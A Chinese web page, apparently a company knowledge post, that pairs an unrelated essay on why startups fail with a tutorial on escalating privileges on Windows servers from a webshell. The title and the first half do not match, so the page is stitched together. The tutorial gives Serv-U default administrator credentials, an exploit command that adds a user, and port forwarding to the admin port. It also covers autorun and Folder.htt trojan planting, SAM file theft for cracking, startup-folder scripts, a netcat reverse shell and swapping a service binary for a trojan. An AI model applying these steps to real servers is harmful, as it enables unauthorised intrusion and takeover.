艾銻知識(shí) | 服務(wù)器 提權(quán)方法大全

2020-03-10 15:13 作者：艾銻無限 瀏覽量：

據(jù)不完全統(tǒng)計(jì),中國有近5000萬家中小微企業(yè),這個(gè)數(shù)據(jù)隨著互聯(lián)網(wǎng)的發(fā)展還在持續(xù)增長,但這些企業(yè)的存活率是非常低的,60%的初創(chuàng)企業(yè)活不過1年,30%的初創(chuàng)企業(yè)活不過3年,還有超過9%的企業(yè)只有5年左右的生存期,剩下不到1%的企業(yè)活過5年以上,幸運(yùn)的可以達(dá)到10年,甚至更長一些.

為什么中小微企業(yè)的存活率這么低呢?

透過成千上萬的失敗案例,我們總結(jié)了以下五大方面的原因:

第一,創(chuàng)業(yè)失敗創(chuàng)始人難辭其咎,我們在學(xué)校里是沒有一堂課是教如何創(chuàng)業(yè),如何才能創(chuàng)業(yè)成功,即使現(xiàn)在有很多大學(xué)嘗試著在學(xué)校開辦一些創(chuàng)業(yè)的課程,也不系統(tǒng),更不專業(yè),因?yàn)閯?chuàng)業(yè)是一件極其復(fù)雜的工作,是需要多項(xiàng)技能的集合以及熟練的運(yùn)用才有可能應(yīng)對突如其來的變化,創(chuàng)業(yè)初期就像一艘孤獨(dú)的小船面對波濤洶涌的大海,但船長從來都沒有開過任何一艘船駛出過海港,風(fēng)浪來的時(shí)候,只有慌張和恐懼,最后被海水吞沒.

第二,創(chuàng)業(yè)失敗是價(jià)值觀不統(tǒng)一,方向不一致,團(tuán)隊(duì)不團(tuán)結(jié),風(fēng)平浪靜,風(fēng)和日麗,其實(shí)沒什么關(guān)系,大家都在享受陽光帶來的美好和快樂,只有遇到風(fēng)浪,生死攸關(guān)或個(gè)人利益受到極大沖突時(shí),人性的弱點(diǎn)才會(huì)突顯,當(dāng)每個(gè)人只盯著個(gè)人得失或眼光短淺時(shí),如果這個(gè)時(shí)候創(chuàng)始人沒有力挽狂瀾,強(qiáng)大的信念和人格魅力來一統(tǒng)所有人的行動(dòng)準(zhǔn)則,在危機(jī)中遲疑,就等于在死神面前跳舞,當(dāng)年阿里的“中國供應(yīng)商”客戶涉嫌欺詐事件,如果不是馬云明察秋毫,當(dāng)即立斷,我相信也不會(huì)有今天阿里世界霸主的地位.

第三,創(chuàng)業(yè)失敗是固步自封,看不見高山,如果我們只能看見自己的山最高,沒有走出去,沒有學(xué)習(xí)的心態(tài),沒有敬畏之心,很快時(shí)代就會(huì)把我們淘汰,當(dāng)年的諾基亞,柯達(dá)就是最好的例子.無論企業(yè)多大,都要有一顆創(chuàng)業(yè)的心,永遠(yuǎn)相信還能做的更好,還可以再創(chuàng)新,還會(huì)想出其它的可能性.真正的對手不在外面,而在我們心中,心中無敵,才能無敵于天下.

第四,創(chuàng)業(yè)失敗是誤解了”客戶是上帝”,上帝并不是時(shí)時(shí)都知道自己要什么,我們不能只限于客戶表面的表達(dá)就決定了他們的需求,很多企業(yè)死就死在客戶的假需求中,看起來好像是客戶追求的產(chǎn)品,需要的服務(wù),但實(shí)際當(dāng)產(chǎn)品生產(chǎn)出來,當(dāng)服務(wù)送到客戶面前,并沒有真正吸引到客戶的注意,愿意為此而買單,核心本質(zhì)就是我們曲解了”客戶是上帝”這句話,真正的上帝是不會(huì)當(dāng)自己是至高無上的,也不會(huì)對品質(zhì)無底限的追求,更不會(huì)對服務(wù)沒有節(jié)制要求,其實(shí)客戶就是客戶,他們絕大部分人都是普通人,有著普通人的欲望,有著普通人的不滿足,有著普通人想要花更少的錢卻要得到更多的意識(shí),他們的只忠誠于更便宜更高的品質(zhì),這一切都是企業(yè)需要認(rèn)知到的本質(zhì),不然你的”上帝”是不會(huì)為你持續(xù)付費(fèi)的.

第五,創(chuàng)業(yè)失敗是講多了人情講少了制度,公司小,三五個(gè)人可以不需要任何制度,甚至也不需要任何系統(tǒng),因?yàn)槟菚r(shí)彼此聯(lián)結(jié)非常深,情感的能量可以喚醒每個(gè)人的斗志和決心 ,但當(dāng)企業(yè)發(fā)展到幾十個(gè)人甚至幾百個(gè)人時(shí),那種深深的聯(lián)結(jié)感很難在感受到,人性的弱點(diǎn)就會(huì)被環(huán)境所喚醒,就會(huì)被利益所綁架,就會(huì)被自私所控制,但也不是有了制度就有了保障,制度是人的工具,制度最終是服務(wù)于人,只有促進(jìn)發(fā)展的制度,可能激勵(lì)人性向善的制度才能長久, 反之亦然.

如果你想想創(chuàng)立一家公司?

如果你是一家剛剛開始創(chuàng)業(yè)的公司?

如果你現(xiàn)在在創(chuàng)業(yè)的過程中遇到了挑戰(zhàn)?

結(jié)合上面的五大常見創(chuàng)業(yè)失敗,我們總結(jié)出來了五個(gè)可以讓你有更大成功機(jī)率的法則,可以讓你活的更久一些,但不保證你一定成功,因?yàn)槭率伦兓?因緣和合,萬法無常,只能隨機(jī)而變.

第一法則:準(zhǔn)備自己

創(chuàng)始人需要自我審視,首先要準(zhǔn)備好自我犧牲的精神,要做好大海有風(fēng)暴的思想準(zhǔn)備,其次利用一切可以實(shí)踐的機(jī)會(huì)去鍛煉自己的綜合能力,不僅僅相信前輩和書本的聲音,更需要相信實(shí)戰(zhàn)后帶來的思考和反思.即要有遠(yuǎn)大的理想和抱負(fù),又要有腳踏實(shí)地做好每一件事的決心.

第二法則:認(rèn)識(shí)自我

創(chuàng)始人要極早的認(rèn)識(shí)自我,想清楚為什么要?jiǎng)?chuàng)業(yè)比創(chuàng)業(yè)更重要,清晰明確的了解自己的價(jià)值是什么?什么是自己會(huì)堅(jiān)持的,什么是自己抗拒的,混亂的價(jià)值觀就會(huì)吸引五花八門的人,企業(yè)內(nèi)部的斗爭都是創(chuàng)始人自己思想的斗爭,初創(chuàng)企業(yè)所呈現(xiàn)出來的一切現(xiàn)象都是創(chuàng)始人內(nèi)在的顯化.當(dāng)年阿里快速成長,內(nèi)部也出現(xiàn)了一系列的問題,但極其智慧的馬云沒有去解決這些問題,反而把自己關(guān)在道觀中整整7天,最后終于想明白了三個(gè)問題:我要什么,我有什么,我要放棄什么,當(dāng)他想清晰這三個(gè)問題后,并向全公司傳遞出來,最后所有那些紛繁復(fù)雜的問題都不解自明.

第三法則:持續(xù)打開

創(chuàng)始人的天花板就是企業(yè)的天花板,企業(yè)無法突破,就是創(chuàng)始人沒有突破自己,突破其實(shí)不容易,因?yàn)楣逃械挠^念就像萬里長城一樣,非一日之功,是多少個(gè)春夏秋冬,嚴(yán)寒酷暑的積累和沉淀,這些不是沒有價(jià)值,而是幫助過我們創(chuàng)了價(jià)值,讓我們來到了今天這一步,但如果我們期望有一個(gè)更大的世界,就需要放下它們,放下我們曾經(jīng)一直的堅(jiān)持和執(zhí)著,打開自己,讓自己接納一個(gè)全新的可能性,也許過不了多久,我們又會(huì)把這些新的東西奉為圭臬但只要我們還想看到一個(gè)更大的可能性,就需要再次打開自己,重新建立認(rèn)知,我們一生都是在打開和重建過程中,直到生命的終結(jié),又一切回歸原點(diǎn).

第四法則:回歸本質(zhì)

創(chuàng)始人剛開始需要和團(tuán)隊(duì)一起參與戰(zhàn)斗,甚至做具體細(xì)節(jié)工作,因?yàn)槌鮿?chuàng)需要激情來點(diǎn)燃,而創(chuàng)始人是這個(gè)團(tuán)隊(duì)最有激情的一個(gè)人,初創(chuàng)團(tuán)隊(duì)需要有人帶動(dòng)去點(diǎn)燃更大的燃料.當(dāng)所有團(tuán)隊(duì)和部門走向正軌時(shí),創(chuàng)始人更大的價(jià)值是深度的思考,有效的區(qū)分,精神的引領(lǐng)和正確的選擇.

企業(yè)越來越大,事情就會(huì)越來越多,如果沒有一個(gè)清醒的大腦保持深度的思考,就像讓企業(yè)很多人很忙,忙是一種現(xiàn)象,并不代表有價(jià)值,只有透過深度思考發(fā)現(xiàn)事物的本質(zhì),才知道忙什么才是最重要的,

懂得有效的區(qū)分是一個(gè)領(lǐng)導(dǎo)者必須掌握的能力, 《尼布爾的祈禱文》說:”上帝，請賜予我平靜，去接受我無法改變的。給予我勇氣，去改變我能改變的，賜我智慧，分辨這兩者的區(qū)別。”只有具備分辨的智慧,才不會(huì)讓自己誤入歧途.

創(chuàng)始人要有強(qiáng)大的精神力量,讓所有員工感受到這股力量,因?yàn)樗械某晒Χ茧x不開一個(gè)偉大的精神領(lǐng)袖,就像蘋果的喬布斯,微軟的比爾蓋茨和阿里的馬云.

選擇比努力更重要,這句話告訴我們順勢而為的選擇可以讓我們在同樣的努力情況下獲得不同的結(jié)果,如何才能具備這樣明智選擇的能力呢,強(qiáng)大的深度思考能力和有效的區(qū)分能力就可以幫到我們看見正確的選擇.

第五法則:創(chuàng)造系統(tǒng)

創(chuàng)始人是人,是人就會(huì)有七情六欲,就會(huì)有生老病死,就會(huì)有悲歡離合,這些人性的因素會(huì)讓我們很不穩(wěn)定,但企業(yè)能持久有效的運(yùn)轉(zhuǎn)一定是在穩(wěn)定的能量下運(yùn)行,所以不能始終靠人來推動(dòng),企業(yè)想要活的久一定是有內(nèi)生的系統(tǒng),只有建立一個(gè)自動(dòng)運(yùn)轉(zhuǎn)的系統(tǒng)才能保持穩(wěn)定健康的成長.

以上的分享像從管子里看豹，只看見豹身上的一塊花斑，看不到全豹,以此拋磚引玉,希望有更多人可以把自己創(chuàng)業(yè)的經(jīng)歷和經(jīng)驗(yàn)分享出來,從而讓我們更全面的看見一家企業(yè)怎樣做才能活得久,活的好,活的更有價(jià)值.

艾銻知識(shí) |服務(wù)器 提權(quán)方法大全

現(xiàn)在可以說網(wǎng)絡(luò)管理員對服務(wù)器的設(shè)置是越來越BT，但BT的同時(shí)，也有黑客朋友們對服務(wù)器的不斷的測試，在測試中往往獲取最低的guest權(quán)限是簡單的，像我們在入侵網(wǎng)站過程中，獲取webshell是簡單的，但是當(dāng)由webshell的guest權(quán)限向system權(quán)限提升時(shí)卻往往是止步不前。所以我有想寫這樣一篇文章的想法，但是在思考的過程中，又不得不承認(rèn)，方法是不斷的探索中出來的，方法更是有常規(guī)的也有另辟蹊徑的。下面就做一些簡單的介紹，對提權(quán)的方法進(jìn)行一些介紹，同時(shí)也希望在更多朋友的不斷回復(fù)中能夠豐富我們的方法。

首先要說明的是，過早的一些漏洞我們就不再多說了，只說一些現(xiàn)在可以見到的吧。還有就是本文的題目是webshell下的服務(wù)器提權(quán)方法。

下面我們就進(jìn)入主題，對webshell的提權(quán)方法！

首先我們要明確的是，提權(quán)一般是依靠主機(jī)所開通的服務(wù)，利用服務(wù)存在的漏洞和管理員設(shè)置的疏忽進(jìn)行提權(quán)的，不過也不排除一些SB的管理員對服務(wù)器設(shè)置的似乎沒有"穿衣服".下面就是針對一些常見的服務(wù)進(jìn)行的提權(quán)方法。
在獲取webshell后，我們常見的是看一下系統(tǒng)的服務(wù)，查看服務(wù)可以通過利用掃描器對服務(wù)器ip進(jìn)行掃描，或是在webshell中有執(zhí)行dos命令時(shí)查看net start來查看主機(jī)所開放的服務(wù)。首先我們說一下從簡單的開始說起：

1。pcanywhere的提權(quán)方法

pcanywhere軟件我想大家都了解，為什么將它放在首位就是因?yàn)樽x取密碼后直接連接就可以了，如果對方主機(jī)在開通了pcanywhere的服務(wù)端的話，我們看能否跳轉(zhuǎn)到這個(gè)目錄C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\，如果行那就最好了，直接下載它的CIF文件，然后使用pcanywhere的密碼讀取器得到pcAnywhere密碼，然后使用pcanywhere登陸即可!接下來就是可視化操作了。

2。Serv-U提權(quán)方法

Serv-u可以說是網(wǎng)絡(luò)上比較火的一款FTP服務(wù)器軟件，有許多像我這樣的小黑們都是看系統(tǒng)服務(wù)中是否有Serv-u的系統(tǒng)進(jìn)程來進(jìn)行提權(quán)的。Serv-u的提權(quán)方法針對不同的版本也有不同的方法，這里我們就列舉一二，可能不是很全，但在其他網(wǎng)友的回復(fù)中能夠不斷的補(bǔ)充吧！

a.serv-U本地提權(quán):serv-U本地提權(quán)一般是利用溢出程序?qū)erv-u的設(shè)置上的缺陷進(jìn)行添加超級(jí)賬戶的功效。例如Xiaolu寫的serv-u.exe就是利用sevr-u的默認(rèn)管理端口，管理員賬號(hào)和密碼進(jìn)行提權(quán)的，默認(rèn)本地管理端口是：43958，默認(rèn)管理員：LocalAdministrator，默認(rèn)密碼：#l@$ak#.lk;0@P，這是集成在Serv-u內(nèi)部的，可以以Guest權(quán)限來進(jìn)行連接，對Serv-u進(jìn)行管理，利用本地提權(quán)的關(guān)鍵就是尋找服務(wù)器文件目錄中的everyone權(quán)限目錄，下面我給大家列舉些常見的everyone權(quán)限目錄：

c:\winnt\system32\inetsrv\data\

是erveryone 完全控制，很多時(shí)候沒作限制，把提升權(quán)限的工具上傳上去，然后執(zhí)行

c:\prel

C:\Program Files\Java Web Start\

c:\Documents and Settings\

C:\Documents and Settings\All Users\Documents\

很多時(shí)候data目錄不行，試試這個(gè)很多主機(jī)都是erveryone 完全控制！

C:\Program Files\Microsoft SQL Server\

c:\Temp\

c:\mysql\(如果服務(wù)器支持PHP）

c:\PHP(如果服務(wù)器支持PHP）

上面一些目錄就是常見的，不過也不排除一些特殊的，像江民的kv2004對文件夾的權(quán)限設(shè)置就不是很嚴(yán)格的。

不過針對本地提權(quán)是可以防范的，下面是我在xiaolu的文章中節(jié)選的：

防止辦法和對策：

一般防止方法：設(shè)置目錄權(quán)限，通過去掉Web目錄iusr用戶的執(zhí)行權(quán)限來防止使用Webshell來運(yùn)行Exp程序。

對策：這種方法有一定的局限性，需要設(shè)置的目錄很多，不能有一點(diǎn)疏漏，比如我就發(fā)現(xiàn)很多虛擬主機(jī)在C:\Documents and Settings\All Users\ Documents目錄以及下邊幾個(gè)子目錄Documents沒有設(shè)置權(quán)限，導(dǎo)致可以在這個(gè)目錄上傳并運(yùn)行Exp，這種目錄還有x:\php,x:\perl等，因?yàn)檫@種目錄都是
everyone完全控制的。有些主機(jī)還支持php,pl,aspx等，這簡直就是服務(wù)器的Serv-U災(zāi)難，^_^，運(yùn)行程序更加方便。

高級(jí)一點(diǎn)的防止辦法：修改Serv-u管理端口，用Ultraedit打開ServUDaemon.exe查找B6AB(43958的16進(jìn)制)，替換成自己定義的端口比如3930（12345），打開ServUAdmin.exe找到最后一個(gè)B6AB替換成3930（12345）,啟動(dòng)Serv-u，現(xiàn)在本地管理端口就成了12345了：

TCP 127.0.0.1:12345 0.0.0.0:0 LISTENING

對策：對付這種也很簡單，netstat –an,就能看到端口了，有人說netstat無法運(yùn)行，其實(shí)你再上傳個(gè)netstat.exe到可執(zhí)行目錄運(yùn)行就ok了，然后修改一下Exp編譯，上傳運(yùn)行就好了，我修改了一個(gè)可以自定義端口的Exp,運(yùn)行格式：

USAGE: serv-u.exe port "command"

Example: serv-u.exe 43958 "net user xl xiaoxue /add"

更高級(jí)的防止辦法：修改管理員名和密碼，用Ultraedit打開ServUDaemon.exe查找Ascii：LocalAdministrator，和#l@$ak#.lk;0@P，修改成等長度的其它字符就可以了，ServUAdmin.exe也一樣處理。

對策：這下默認(rèn)的管理員連接不上了，還有辦法么？嘿嘿，有的管理員安裝Serv-u都是使用默認(rèn)目錄C:\Program Files\Serv-U安裝，這個(gè)目錄雖然不能寫，也不能修改，但是默認(rèn)iusr是可以讀的，我們可以用webshell來下載ServUDaemon.exe，用Ultraedit打開分析一下，Serv-U的帳號(hào)密碼就到手

了，修改Exp編譯上傳運(yùn)行，我們又勝利了。

終極防御：

a.設(shè)置好目錄權(quán)限，不要疏忽大意；

b.Serv-U最好不要使用默認(rèn)安裝路徑，設(shè)置Serv-U目錄的權(quán)限，只有管理員才能訪問；

c.用我介紹的辦法修改Serv-U的默認(rèn)管理員名字和密碼，喜歡的話端口也可以改掉。

d.serv-U管理端口定向轉(zhuǎn)發(fā)法：這里需要使用的工具是FPipe.exe

我們要知道Serv-u默認(rèn)本地管理端口是：43958,這個(gè)是只允許本地ip127.0.0.1進(jìn)行登陸和管理的，那么我們就想能不能通過端口轉(zhuǎn)向來遠(yuǎn)程管理呢？所以我們用到FPipe.exe，首先是將FPipe.exe上傳至服務(wù)器中，然后再cmd下執(zhí)行

Fpipe.exe -v -l 12345-r 43958 127.0.0.1

這里要說明的是，這段字符的意思是當(dāng)訪問12345端口時(shí)就會(huì)自動(dòng)轉(zhuǎn)向43958端口，也就是serv-u的管理端口

所以我們在本地安裝一個(gè)Serv-u，

新建一個(gè)服務(wù)器，填入對方IP，

user:

LocalAdministrator

pass:

#l@$ak#.lk;0@P

連接上后你就可以管理他的Serv-u了，剩下的操作就是執(zhí)行上面提到的方法了！

===================================================

Serv-U的方法我就總結(jié)出這幾個(gè)來，可能還有其他的方法我沒有看到吧

不過個(gè)人認(rèn)為關(guān)鍵還是本地溢出漏洞的應(yīng)用要比較多一些，所以網(wǎng)上也常常出現(xiàn)serv-u的本機(jī)溢出程序

不同版本的更是層出不窮，前一段時(shí)間針對serv-u6.0.2的修改了默認(rèn)管理員賬號(hào)和密碼的相關(guān)文章還請大家參照校園黑客聯(lián)盟的小魚修煉中的文章。

Serv-U的提權(quán)文章就暫時(shí)先總結(jié)到這里，有更好的方法還請大家回復(fù)！



3.Autorun方法：這種方法也可以說是比較古老的方法，最初應(yīng)該是從光盤自動(dòng)播放中尋找到的靈感吧？不進(jìn)行細(xì)說，給出格式即可

制作一個(gè)Autoruan.inf文件.內(nèi)容如下

[AutoRun]

open=bear.exe

bear.exe為木馬程序，與autorun.inf放在同一目錄下！



4。SAM破解方法： 進(jìn)入C:\WINNT\system32\config\ 下載他的SAM文件用lc等破解工具破解。



5。相關(guān)腳本提權(quán)方法：前面的serv-u的ftp提權(quán)中提過的vbs這里再說下.進(jìn)入c:\Documents and Settings\All Users\「開始」菜單\程序\啟動(dòng) 寫入bat或vbs文件。這種方法也是屬于守株待兔類的，只有在對方主機(jī)重起以后才可以達(dá)到目的。


6。NC的反彈提權(quán)：這里就要說NC的相關(guān)用法了，如果在對方服務(wù)器中有足夠的權(quán)限執(zhí)行nc的話就好了，把它反彈到自己的電腦上，你就可以進(jìn)行相關(guān)操作了！瑞士軍刀具體方法不多說，給出格式，如下：

server:nc -e cmd.exe ip 1234

client: nc -l -p 1234



7。conn等asp文件中泄漏SQL帳戶密碼方法：這種方法說起來應(yīng)該算是比較僥幸的方法。曾經(jīng)馬俊和我說過一次，原來沒有太在意，現(xiàn)在還真的感覺有些好用了，找到賬號(hào)密碼和數(shù)據(jù)庫名在對方?jīng)]有刪除xp_cmdshell條件下用sql連接工具連接即可，連接上后就可以輸入你想要的CMD命令了。


8。VNC的相關(guān)提權(quán)：VNC也是一個(gè)類似pcanywhere的遠(yuǎn)程管理軟件，在linux應(yīng)用廣泛，曾經(jīng)在看臺(tái)灣的一些服務(wù)器中有很多使用VNC的，方法也是我在網(wǎng)絡(luò)中學(xué)到的，不過在應(yīng)用中就成功過一次，比較郁悶！方法就轉(zhuǎn)載一下吧，網(wǎng)址：http://www.hxhack.org/Article/HTML/14184.html

還有要補(bǔ)充的就是vnc是可以反向連接的，這個(gè)方法我沒有試過，只是曾經(jīng)看影子做過一個(gè)視頻動(dòng)畫。


9。desktop.ini與Folder.htt方法。（此方法是在網(wǎng)絡(luò)看到的）方法如下：首先建立一個(gè)文件夾，進(jìn)入，在空白處點(diǎn)右鍵，選擇“自定義文件夾”一直下點(diǎn)，默認(rèn)即可。完成后，你就會(huì)看到在此目錄下多了兩個(gè)名為Folder

setting的文件架與desktop.ini的文件，如果看不到，就把顯示所有文件給選上，然后我們在Folder setting目錄下找到Folder.htt文件，記事本打開，在任意地方加入以下代碼：<OBJECT ID=“RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=“木馬名”></OBJECT> 然后你將
你的木馬文件放在Folder setting目錄下，把此目錄與desktop.ini一起上傳到對方任意一個(gè)目錄下，就可以了，只要等管理員瀏覽了此目錄，它就執(zhí)行了我們的木馬，此方法也屬于類似autorun的守株待兔方法。

10。替換服務(wù)提權(quán)：我認(rèn)為比較復(fù)雜，不過有些時(shí)候也實(shí)用，首先是看服務(wù)進(jìn)程，在看我們是否有執(zhí)行命令的權(quán)限，這里要用到的命令是rename，相關(guān)用法：

C:\>rename /?

重命名文件。

RENAME [drive:][path]filename1 filename2.

REN [drive:][path]filename1 filename2.


例如替換c:\kv2004\kv.exe的進(jìn)程

rename c:\kv2004\kv.exe bear.exe

然后再將我們的本地木馬文件命名為kv.exe上傳到c:\kv2004\目錄下，等待對方重新起動(dòng)機(jī)算機(jī)即可！